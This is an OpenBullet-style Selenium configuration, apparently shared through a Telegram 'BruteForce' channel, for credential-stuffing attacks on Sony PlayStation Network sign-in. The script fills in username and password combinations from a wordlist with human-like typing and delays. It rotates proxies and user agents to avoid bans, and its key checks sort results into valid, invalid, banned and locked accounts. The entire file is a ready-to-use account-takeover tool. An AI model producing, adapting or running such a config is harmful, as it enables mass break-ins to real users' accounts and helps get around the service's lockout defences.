[SETTINGS]
{
  "Name": "PSN Selenium",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-06-06T23:38:23.6285021+02:00",
  "AdditionalInfo": "T.me/BruteForce",
  "RequiredPlugins": [],
  "Author": "H0S31N",
  "Version": "1.2.1",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": true,
  "AlwaysQuit": false,
  "QuitOnBanRetry": true,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": true,
  "CustomCMDArgs": ""
}

[SCRIPT]
#OPEN BROWSERACTION Open 

NAVIGATE "https://id.sonyentertainmentnetwork.com/id/tv/signin/?/signin#/signin" 

#Set BROWSERACTION SetWidth "598" 

#Delay FUNCTION Delay "1500" -> VAR "Delay" 

#Click ELEMENTACTION XPath "//*[@id=\"ember14\"]" 
  Click 

#Send ELEMENTACTION XPath "//*[@id=\"ember14\"]" 
  SendKeysHuman "<USER>" 

#Delay FUNCTION Delay "1100" -> VAR "Delay" 

#Click ELEMENTACTION XPath "//*[@id=\"ember17\"]" 
  Click 

#SendP ELEMENTACTION XPath "//*[@id=\"ember17\"]" 
  SendKeysHuman "<PASS>" 

#Delay FUNCTION Delay "2500" -> VAR "Delay" 

#Enter BROWSERACTION SendKeys "<ENTER>" 

#Delay FUNCTION Delay "1200" -> VAR "Delay" 

#Wait ELEMENTACTION Id "" 
  WaitForElement "2s" 

#DOM BROWSERACTION DOMtoSOURCE 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "An error occurred during communication with the server." 
  KEYCHAIN Failure OR 
    KEY "The sign-in ID (email address) or password is not correct." 
  KEYCHAIN Ban OR 
    KEY "The connection to the server timed out." 
    KEY "A connection to the server could not be established." 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Either your account has been locked due to multiple failed sign-in attempts, or your password needs to be reset due to security reasons." 

